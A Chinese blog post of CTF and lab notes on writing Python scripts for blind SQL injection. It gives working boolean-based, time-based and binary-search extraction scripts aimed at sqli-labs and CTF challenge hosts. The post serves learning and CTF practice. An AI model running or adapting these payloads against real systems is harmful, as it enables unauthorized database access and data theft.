SQL注入脚本编写

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量2.1k 收藏 21
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45785288/article/details/109679843
版权

SQL注入脚本编写

穷举

1.bool盲注脚本(post型)

import requests
url = "http://127.0.0.1/sqli-labs-master/Less-15/"
result =""
for i in range(1,10):
	for j in range(65,150):
		payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j)
		payload2 = "admin'^(ascii(mid(database()from {}))>{})^1%23".format(i,j)
		data = {"uname":payload1,"passwd":"123"}
		r = requests.post(url,data=data)
		if "slap.jpg" in r.text:
			result += chr(j)
			print (result)
			break

用到了位运算符 (^)

原理:

我们高中的时候学习的数学逻辑。异或就是一种逻辑运算,运算法则概括起来说就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),null与任何条件做异或运算都为null,如果从数学的角度理解就是,空集与任何集合的交集都为空。

mysql`里异或运算符为`^` 或者 `xor

下面我在本地的环境测试一下

两个同为真的条件做异或,结果为假

img

两个同为假的条件做异或,结果为假

img

一个条件为真,一个条件为假,结果为真

img

null与所有条件做异或结果都为null

img

2.bool (get型)

import requests
import string

str1 = '1234567890' + string.ascii_letters + string.punctuation
flag = ''
url = "http://a92ea67c-bde8-4b3c-9049-a486d2ff191d.chall.ctf.show/"
for j in range(1, 88):
    for i in str1:
        paylaod = "0' or (if(substr((select flag from web2.flag),{},1)='{}',1,0))#".format(j, i)
        # print(paylaod)
        data = {
            'username': paylaod,
            'password': 'admin'
        }
        r = requests.post(url, data=data)
        if 'ctfshow' in r.text:
            flag += i
            print(flag)
            break

3.时间盲注

import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+"
result  = ''
for i in range(1,10):
	for j in range(23,127):
		payload = url.format(str(i),str(j))
		time1 = time.time()
		r = requests.get(payload)
		time2 = time.time()
		time3 = time2 - time1
		if time3 > 4:
			result += chr(j)
			print (result)
			break

二分法

这是网上找一个大佬的

环境:[CISCN2019 华北赛区 Day2 Web1]Hack World

我也不知道为什么我的电脑跑不出来。可能这就是菜鸡和大佬的区别吧

import requests

url = "http://d849db01-ae4b-4faa-a7e0-3ede26de2b4f.node3.buuoj.cn/index.php"
result = ""
for i in range(1,100):
	min_value = 33
	max_value = 130
	mid = (min_value+max_value)//2 #中值
	while(min_value<max_value):
		payload ={"id" : "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)}
		html = requests.post(url,data=payload)
		print(payload)
		if "Hello, glzjin wants a girlfriend." in html.text:
            	#ascii值比mid值大
			min_value = mid+1   
		else:
			max_value = mid
		mid = (min_value+max_value)//2
    	#找不到目标元素时停止
	if(chr(mid)==" "):
		break
	result += chr(mid)
	print(result)
print("fina flag:",result)

下面这个是我师兄的

非常平滑,好好学习

import requests

url="http://783dfdd8-9d2e-4e68-b3df-e1b718d4a572.chall.ctf.show/"
flag=''
for i in range(1,50):
    f1=flag
    top=127
    low=33
    while low<=top:#向下整除
        mid=(top+low)//2
        data={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))>{},1,0)#".format(str(i),str(mid)),'password':'admin'}
        data1={'username':"admin' or if(ascii(substr((select flag from web2.flag),{},1))={},1,0)#".format(str(i),str(mid)),'password':'admin'}
        try:
            r1=requests.post(url,data=data1)
            print(i,mid)
            if 'ctfshow' in r1.text:
                flag+=chr(mid)
                print(flag)
                break
            r=requests.post(url,data=data)
            if 'ctfshow' in r.text:
                low=mid+1
            else:
                top=mid-1
        except Exception as e:
            pass
    if flag==f1:
        break
林一不是01
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自己动手编写SQL注入漏洞扫描器
12-24
自己动手编写SQL注入漏洞扫描器
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
SQL注入(一)-基础
qq_47848569的博客
05-29 1596
sql注入
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1236
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
【PyHacker编写指南】Sql注入脚本编写
XunanSec的博客
05-15 2299
这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python写脚本的小伙伴可以跟着一起写一写。
SQL注入脚本
ChiYanq7ng的博客
11-21 132
【代码】SQL注入脚本
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3187
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1483
本例中以靶机DVWA中的盲注为例。
web安全之sql注入
weixin_54584489的博客
02-21 579
本文主要为sql注入学习,对sql注入进行整体自我学习概括
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
sql注入靶场.zip
06-24
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这个"sql注入靶场.zip"文件包含了一个名为"sqli-labs-master"的靶场,旨在帮助学习者...
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
sqlmap sql注入
08-22
8. **自定义脚本**:对于复杂或特殊的攻击场景,SQLMap允许用户编写自定义Python插件,扩展其功能。 在实际使用中,SQLMap通常通过命令行界面进行操作。例如,`sqlmap -u "http://target.com/page.php?id=1"` 这个...
SQL 注入脚本学习笔记
二进制的博客
10-11 1352
什么是SQL注入,如何理解SQL注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手法expxxx.action?id=1 此时可以在id后加入sql语句进行注入 xxx.action?id=-1 or 1=1 此时查询的信息就是所有的信息SQL注入是怎么产生的? web开发人员无法保证所有的输入都已经过滤 攻击者利用发送给sql服务器的输入数据构造可执行的sql
SQL 注入 五大基本手法
weixin_51559599的博客
11-07 994
适用数据库中的来的情况。联合查询就是利用语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。
【Python脚本SQL盲注漏洞——基于布尔型SQL盲注检测
weixin_55205599的博客
10-18 100
1)写入脚本信息,导入模板,定义存储数据库数据的变量且定义一个request对象用来进行请求。
SQL注入:布尔注入脚本
守拙的博客
07-19 860
SQL注入:布尔注入脚本 实现思路 将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。 数据库名:获取库名长度,库名 数据库表:获取数据库表数量,表名长度,表名 表字段:获取字段数,字段名长度,字段名 表数据:获取该字段数据行数,数据长度,数据内容 关键代码 获取不同数据的payload字典 payload_dict = { "db_name_len":
Python自动化sql注入:布尔盲注_布尔盲注脚本(1),高级网络安全面试题2024
2401_84182636的博客
04-10 597
特点:没有回显没有报错,但根据sql语句正常与否返回不同结果,通过语句是否正常来注入。靶场:sqli-labs第八关。
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 407
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
sql注入漏洞利用脚本
06-06
SQL注入漏洞是常见的Web安全漏洞之一。攻击者可以通过构造恶意的SQL语句,绕过应用程序的身份验证和授权机制,获取敏感信息或者控制数据库服务器。以下是一些SQL注入漏洞利用脚本的建议: 1. 确认漏洞类型:通过对目标网站进行渗透测试,确认是否存在SQL注入漏洞。 2. 构造恶意SQL语句:通过手工或者自动化工具,构造恶意SQL语句,例如获取数据库信息、修改数据等。 3. 编写注入脚本:根据目标数据库的类型和漏洞类型,选择合适的编程语言和注入技术,编写注入脚本。 4. 测试注入脚本:对编写注入脚本进行测试,测试目的是验证注入脚本的正确性和稳定性。 5. 优化注入脚本:根据测试结果,对注入脚本进行优化,提高注入的成功率和效率。 总之,编写SQL注入漏洞利用脚本需要掌握一些基本的技能和知识,需要不断学习和实践。同时,需要注意漏洞利用的合法性和道德性,避免对他人造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值